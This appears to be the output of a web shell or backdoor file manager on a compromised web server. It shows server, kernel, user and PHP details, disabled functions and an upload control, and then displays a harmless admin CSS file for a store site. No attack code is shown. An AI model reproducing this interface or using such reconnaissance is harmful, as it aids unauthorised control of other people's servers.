HEX
Server: nginx/1.24.0
System: Linux rtfmfm 6.8.0-71-generic #71-Ubuntu SMP PREEMPT_DYNAMIC Tue Jul 22 16:52:38 UTC 2025 x86_64
User: neo (1001)
PHP: 7.4.33
Disabled: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
Upload Files
File: /var/www/store.akrozia.org/public/css/admin_style.css
body {
    font-size: 0.9em;
}
/*body .card-body { font-size: .9em; }*/

.pager {
    text-align: center;
}
.text-warning {
    color: #ffc107;
}
.text-danger {
    color: #dc3545;
}

.text_btn {
    background-color: transparent;
    border: 0;
    margin: 0;
    padding: 0;
    cursor: pointer;
}
.delete_text {
    margin-bottom: 0;
    color: #d9534f;
}

.pagination_buttons {
    float: right;
    margin-top: 10px;
}
.table {
    margin-bottom: 0 !important;
}
.card-header {
    font-size: 1.6em;
}

.dataTables_length,
.dataTables_filter,
.dataTables_info,
.dataTables_paginate {
    padding: 15px 15px 10px 15px;
}

#products_table {
    font-size: 14px;
}
.green_check {
    color: #28a745;
}
.nowrap {
    white-space: nowrap;
}

.error {
    color: #dc3545;
    font-family: 'Exo 2';
}

.active_link a {
    border-bottom: 2px solid #17a2b8;
    color: #000 !important;
}

a.prodListLink:hover {
    text-decoration: none !important;
}
a.prodListLink .card-body:hover {
    background-color: #b7daff !important;
}

.prodListBarcode,
.prodListSupplier,
.prodListSku {
    color: #666;
}

.searchBox {
    border: 1px solid #007bff;
    border-radius: .25em;
}